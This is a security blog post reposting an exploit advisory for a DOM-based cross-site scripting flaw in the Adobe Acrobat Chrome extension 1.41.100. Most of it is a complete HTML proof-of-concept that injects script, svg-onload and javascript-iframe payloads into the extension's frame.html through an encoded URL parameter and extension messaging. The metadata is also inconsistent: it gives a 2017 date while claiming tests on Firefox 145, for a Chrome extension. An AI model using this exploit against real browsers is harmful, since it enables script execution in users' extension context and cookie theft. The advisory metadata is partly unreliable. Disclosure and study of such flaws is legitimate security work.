Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

 

 

Adobe Acrobat Chrome 1.41.100 Cross Site Scripting

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 89
Adobe Acrobat Chrome extension version 1.41.100 was found to be Adobe Acrobat Chrome extension version 1.41.100 was found to be vulnerable to Cross-Site Scripting (XSS).

This security flaw allowed an attacker to inject malicious scripts into web pages viewed by users of the affected extension. The vulnerability typically stemmed from insufficient input validation, where the extension processed user-supplied data without proper sanitization.

Successful exploitation could lead to various attacks, including:
* Session hijacking (stealing user cookies)
* Defacement of web content
* Redirecting users to malicious websites
* Phishing attacks

An attacker could leverage this to execute arbitrary JavaScript in the context of the user's browser. Adobe subsequently released updates to address this XSS vulnerability. Users were advised to update their Adobe Acrobat Chrome extension to the latest available version to mitigate the risk.

=============================================================================================================================================
| # Title : Adobe Acrobat Chrome V 1.41.100 Extension DOM XSS Exploit |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://chromewebstore.google.com/detail/adobe-acrobat-pdf-edit-co/efaidnbmnnnibpcajpcglclefindmkaj |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212491/

[+] Summary : The Adobe Acrobat Chrome extension fails to sanitize JSON-based message parameters rendered in the frame.html file. This creates a
DOM-based XSS condition. Malicious payloads are executed inside the extension context.

[+] Date: January 2017

Extension: Adobe Acrobat Chrome Extension (ID: efaidnbmnnnibpcajpcglclefindmkaj)

Type: DOM-based Cross-Site Scripting (XSS)

Users Affected: ~30 million installations (via forced auto-update)

[+] Technical Details:

The extension receives JSON data and renders dynamic HTML without
proper sanitization. The vulnerable code accepts untrusted strings
and injects them into the DOM using innerHTML.

[+] Impact:
An attacker can execute arbitrary JavaScript within the extension
context, bypassing browser Same Origin Policy and triggering
extension-level privileges.

[+] Exploit (PoC):
The following sanitized PoC demonstrates the XSS trigger behavior.

Steps to Reproduce:
1. Install Adobe Acrobat Chrome Extension.
2. Visit a crafted local HTML page.
3. Observe execution of JavaScript inside the frame context.

Save Instructions:
Code below should be saved in `poc.html` and opened locally.

Execution:
Open `poc.html` in Chrome with the extension installed. Observe
console logs confirming rendering inside the extension's frame.

[+] POC :

<!DOCTYPE html>
<html>
<head>
<title>Adobe Acrobat XSS Exploit</title>
</head>
<body>
<h2>Adobe Acrobat Extension DOM XSS Exploit</h2>

<div id="exploit-container"></div>

<script>
// Extension ID and vulnerable page
const EXTENSION_ID = 'efaidnbmnnnibpcajpcglclefindmkaj';
const VULNERABLE_PAGE = 'data/js/frame.html';

function createExploit() {
// Advanced XSS payload with multiple vectors
const payload = {
panel_op: "status",
current_status: "failure",
message: `
<div style="background:red;color:white;padding:20px;">
<h1>XSS EXECUTED</h1>
<p>Domain: <script>document.write(document.domain)</script></p>
<svg/onload="alert('POC By Indoushka: ' + location.href)">
</div>
<iframe src="javascript:alert('iframe js')" style="display:none"></iframe>
`.replace(/\n/g, ' ').trim()
};

// URL encode the payload
const encodedPayload = encodeURIComponent(JSON.stringify(payload));
const exploitUrl = `chrome-extension://${EXTENSION_ID}/${VULNERABLE_PAGE}?message=${encodedPayload}`;

return exploitUrl;
}

function executeExploit() {
const exploitUrl = createExploit();

// Method 1: Try with iframe sandbox bypass
const iframe = document.createElement('iframe');
iframe.sandbox = 'allow-scripts allow-same-origin';
iframe.src = exploitUrl;
iframe.style.width = "500px";
iframe.style.height = "400px";
iframe.style.border = "3px solid red";

document.getElementById('exploit-container').appendChild(iframe);

console.log('Exploit URL:', exploitUrl);

// Method 2: Try to trigger via extension messaging
setTimeout(() => {
try {
// Try to communicate with the extension
chrome.runtime.sendMessage(EXTENSION_ID, {
type: 'trefoil_html_convert',
data: payload
}, response => {
console.log('Extension response:', response);
});
} catch(e) {
console.log('Direct messaging failed:', e.message);
}
}, 1000);

// Method 3: Create a popup with user gesture
document.body.onclick = function() {
window.open(exploitUrl, '_blank', 'width=600,height=400');
};
}

// Execute exploit after page load
window.onload = executeExploit;

// Alternative: Use button with user gesture
document.body.innerHTML += `
<button onclick="window.open('${createExploit()}', '_blank', 'width=600,height=400')">
Click to Trigger Exploit (User Gesture Required)
</button>
`;
</script>
</body>
</html>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

Social Media Share